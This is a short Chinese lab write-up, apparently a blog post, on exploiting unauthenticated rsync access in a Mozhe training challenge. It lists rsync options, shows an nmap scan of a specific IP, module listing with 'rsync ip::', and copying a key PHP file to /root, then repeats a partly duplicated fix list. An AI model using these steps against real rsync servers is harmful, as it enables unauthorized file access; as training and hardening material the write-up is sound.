墨者-rsync未授权访问漏洞利用
Rsync
是Linux
下一款数据备份工具,支持通过rsync
协议、ssh
协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员
优点:速度非常快,因为只同步文件当中不同的地方
Rsync默认端口:873
常用指令:
-v, --verbose 详细模式输出。
-q, --quiet 精简输出模式。
-c, --checksum 打开校验开关,强制对文件传输进行校验。
-a, --archive 归档模式,表示以递归方式传输文件,并保持所有文件属性,等于-rlptgoD。
-r, --recursive 对子目录以递归模式处理。
-R, --relative 使用相对路径信息。
-b, --backup 创建备份,也就是对于目的已经存在有同样的文件名时,将老的文件重新命名为~filename。可以使用--suffix选项来指定不同的备份文件前缀。
--backup-dir 将备份文件(如~filename)存放在在目录下。
复现:
![](https://img2020.cnblogs.com/blog/1755571/202004/1755571-20200420174705222-1903953557.png)
1. 先用nmap -A 219.153.49.228 扫一下端口,发现扫不出端口 应该是873被过滤了 那么既然题目给了端口 ,就用题给端口
2.查看服务器目录,命令: rsync --port=端口号 ip::
3.查看服务器目录下的文件。命令: rsync --port=端口号 ip::目录名
这个时候可以看见有个key.php
那么我们下一步就是把这个文件同步到我们本地
4.命令:
rsync --port=48946 219.153.49.228::volume/key_12234179122319.php /root
修复方案:1、禁止外网访问 rsync服务;
2、rsync服务添加认证功能;
3、以低权限运行 rsync 服务;
6、设置防火墙策略;
2、rsync服务添加认证功能;
3、以低权限运行 rsync 服务;
6、设置防火墙策略;